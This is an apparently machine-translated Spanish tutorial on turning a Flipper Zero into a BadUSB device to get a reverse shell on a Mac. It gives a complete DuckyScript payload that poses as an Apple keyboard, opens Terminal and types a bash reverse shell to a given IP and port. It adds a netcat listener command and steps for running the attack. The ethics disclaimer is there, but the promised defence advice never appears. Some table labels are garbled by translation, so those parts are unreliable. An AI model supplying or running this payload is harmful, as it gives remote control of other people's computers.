Este artículo es un ejemplo de cómo usar el Flipper Zero como un dispositivo BadUSB de Pentesting Ético y cómo evitar ser víctima de tal exploit. No use esto en computadoras que no sean de su propiedad o que no tenga permiso para usar. Este código no se esfuerza por ocultarse de los sistemas de detección de intrusiones (IDS), los sistemas de prevención de intrusiones (IPS), los sistemas de detección de red, los cortafuegos o el software antivirus (AV).
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 200
ENTER
DELAY 1000
STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
DELAY 1000
ENTER
DELAY 1000
Dominio | Descripción |
---|---|
ID 05ac:021e Apple:Teclado | Esta línea le dice a macOS que nuestro Flipper Zero es realmente un teclado Apple. Si no usa esta línea, macOS muestra el cuadro de diálogo Asistente de configuración del teclado, lo que hará que su secuencia de comandos falle. |
DEMORA | Este comando indica al sistema operativo que espere un período de tiempo. Si no utilizamos estos retrasos, el script se ejecutará demasiado rápido y fallará. |
ESPACIO GUI | Presiona la tecla Comando de Apple y la barra espaciadora para abrir la ventana 'Búsqueda de Spotlight'. |
Terminal de CADENA | Introduce la cadena 'Terminal' en la ventana de búsqueda de Spotlight |
INGRESAR | Presiona la tecla ENTER o Return en tu teclado. Después de presionar la tecla ENTER, macOS inicia la ventana Terminal (/Aplicaciones/Utilidades/Terminal) |
CADENA bash -i >& /dev/tcp/10.10.10.157/4444 0>&1 | Este comando ingresa el texto en la ventana del terminal que establece una conexión con el servidor Netcat que escucha en 10.10.10.157 en el puerto 4444 |
Cambie la dirección IP en 10.10.10.157 y el puerto 4444 a la dirección IP y el puerto de su servidor.
Guarde este archivo en su disco como rev_shell_macos.txt . No hay una organización de subdirectorios en el directorio badusb en Flipper Zero, por lo que si está utilizando múltiples cargas útiles para diferentes sistemas operativos, use una convención de nomenclatura que signifique algo para usted para que sepa lo que hace.
Seleccione y haga doble clic en el icono de la tarjeta SD para ver el contenido.
Localice y arrastre el archivo rev_shell_macos.txt que creamos anteriormente a la carpeta badusb .
$ nc -nlvp 4444
Dominio | Opciones |
---|---|
Carolina del Norte | Comando netcat |
-nlvp | ( n ) sin resolución de DNS, ( l ) escuchar la conexión entrante, ( v ) salida detallada, ( p ) puerto |
4444 | Número de puerto para escuchar |
Ahora que nuestro oyente Netcat está listo y esperando una conexión entrante, podemos continuar con el ataque Flipper Zero BadUSB.
La parte más difícil ya está hecha. El archivo Flipper Zero BadUSB reverse_shell_macos.txt se escribe, se mueve a Flipper Zero y el oyente de Netcat está esperando una conexión.
Navegue hasta el archivo DuckyScript que copiamos en el paso anterior. Si no ve este archivo, lo copió en el directorio incorrecto. Seleccione rev_shell_macos y haga clic en el botón Ejecutar.
Cuando vea la alerta Conectar a USB , puede conectar su Flipper Zero al puerto USB de su iMac o MacBook. Haga clic en el botón Ejecutar.
Puede ver el progreso de su secuencia de comandos BadUSB en la ventana principal. Una vez que el estado alcanza el 100%, la carga útil está completa y puede eliminar el Flipper Zero.
Si está mirando el monitor de la computadora del iMac, puede ver el exploit mientras ejecuta el DuckyScript. El oyente de Netcat en nuestro servidor Ubuntu muestra los resultados de la solicitud exitosa.
Puede usar comandos regulares de Linux como whoami , pwd , ls o cd para navegar por el sistema de archivos y manipular el sistema operativo.